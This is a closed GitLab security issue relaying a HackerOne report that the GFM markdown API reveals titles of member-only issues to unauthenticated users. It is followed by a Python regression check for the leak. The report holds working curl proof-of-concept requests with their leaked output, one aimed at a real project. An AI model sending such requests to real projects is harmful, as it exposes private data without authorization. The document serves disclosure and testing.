Issue #350691 (Closed)
Issue created Jan 19, 2022 by GitLab SecurityBot (@gitlab-securitybot), Reporter

GFM markdown API discloses issue titles of limited projects

HackerOne report #1450306 by shells3c on 2022-01-15, assigned to @nmalcolm:

Report | How To Reproduce

Report

Summary

The GFM markdown API allows unauthenticated users to read issue titles of projects that have the permission for issues set to Only Project Members.

Steps to reproduce
  1. Create a project, set Issues visibility to Only Project Members
  2. Create an issue
  3. Execute this command (replace [user]/[project] with your project namespace):
curl -H 'Content-Type: application/json' -d '{"project":"[username]/[project]","text":"See #1","gfm":true}' 'https://gitlab.com/api/v4/markdown'  
  4. The response will disclose the title of issue #1 (attribute title):
{"html":"\u003cp data-sourcepos=\"1:1-1:6\" dir=\"auto\"\u003eSee \u003ca href=\"https://gitlab.com/[user]/[project]/-/issues/1\" data-original=\"#1\" data-link=\"false\" data-link-reference=\"false\" data-project=\"[Project ID]\" data-issue=\"[Issue ID]\" data-reference-type=\"issue\" data-container=\"body\" data-placement=\"top\" title=\"This is a private issue\" class=\"gfm gfm-issue has-tooltip\"\u003e#1\u003c/a\u003e\u003c/p\u003e"}  
Examples

Visit: https://gitlab.com/[REDACTED]/alertmanager/-/issues and you can see that the visibility is restricted. Now execute this command:

curl -H 'Content-Type: application/json' -d '{"project":"[REDACTED]/alertmanager","text":"See #7","gfm":true}' 'https://gitlab.com/api/v4/markdown'  

Response:

{"html":"\u003cp data-sourcepos=\"1:1-1:6\" dir=\"auto\"\u003eSee \u003ca href=\"https://gitlab.com/[REDACTED]/alertmanager/-/issues/7\" data-original=\"#7\" data-link=\"false\" data-link-reference=\"false\" data-project=\"25681831\" data-issue=\"100690987\" data-reference-type=\"issue\" data-container=\"body\" data-placement=\"top\" title=\"Internal\" class=\"gfm gfm-issue has-tooltip\"\u003e#7\u003c/a\u003e\u003c/p\u003e"}  

As you can see, the title of issue #7 is Internal; you can check other issues if you want.

Output of checks

This bug happens on GitLab.com

Impact

Accessing all issue titles of projects that have the visibility of issues set to Only Project Members.

How To Reproduce

Please add reproducibility information to this section:

Edited Jun 03, 2022 by Costel Maxim
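
A regression check for the disclosure described in the report, as an added example that is not part of the original issue or of GitLab's code: it parses a captured /api/v4/markdown response and lists every issue reference that was rendered with a title or internal ID. Both sample responses are constructed with placeholder values, and the shape of the non-leaking response is an assumption.

```python
import json
from html.parser import HTMLParser


class IssueRefCollector(HTMLParser):
    """Collects <a> tags that the renderer marked as resolved issue references."""

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("data-reference-type") == "issue":
            self.refs.append({
                "ref": a.get("data-original"),
                "title": a.get("title"),
                "project_id": a.get("data-project"),
                "issue_id": a.get("data-issue"),
            })


def leaked_issue_refs(response_body):
    """Return the issue references in a markdown API response that expose
    a title or internal ID. json.loads also decodes the escaped angle brackets."""
    collector = IssueRefCollector()
    collector.feed(json.loads(response_body)["html"])
    collector.close()
    return [r for r in collector.refs
            if r["title"] or r["project_id"] or r["issue_id"]]


# Constructed sample in the shape shown in the report (placeholder values).
SAMPLE_LEAKY = json.dumps({"html": (
    '<p dir="auto">See <a href="https://gitlab.example/g/p/-/issues/1" '
    'data-original="#1" data-project="111" data-issue="222" '
    'data-reference-type="issue" title="This is a private issue" '
    'class="gfm gfm-issue has-tooltip">#1</a></p>')})

# Constructed sample; assumed shape when the reference is left unresolved.
SAMPLE_UNRESOLVED = json.dumps({"html": '<p dir="auto">See #1</p>'})

if __name__ == "__main__":
    for name, body in (("leaky", SAMPLE_LEAKY), ("unresolved", SAMPLE_UNRESOLVED)):
        print(name, leaked_issue_refs(body))
```

An empty list for a response captured without credentials against a project whose issues are restricted to members is the passing result.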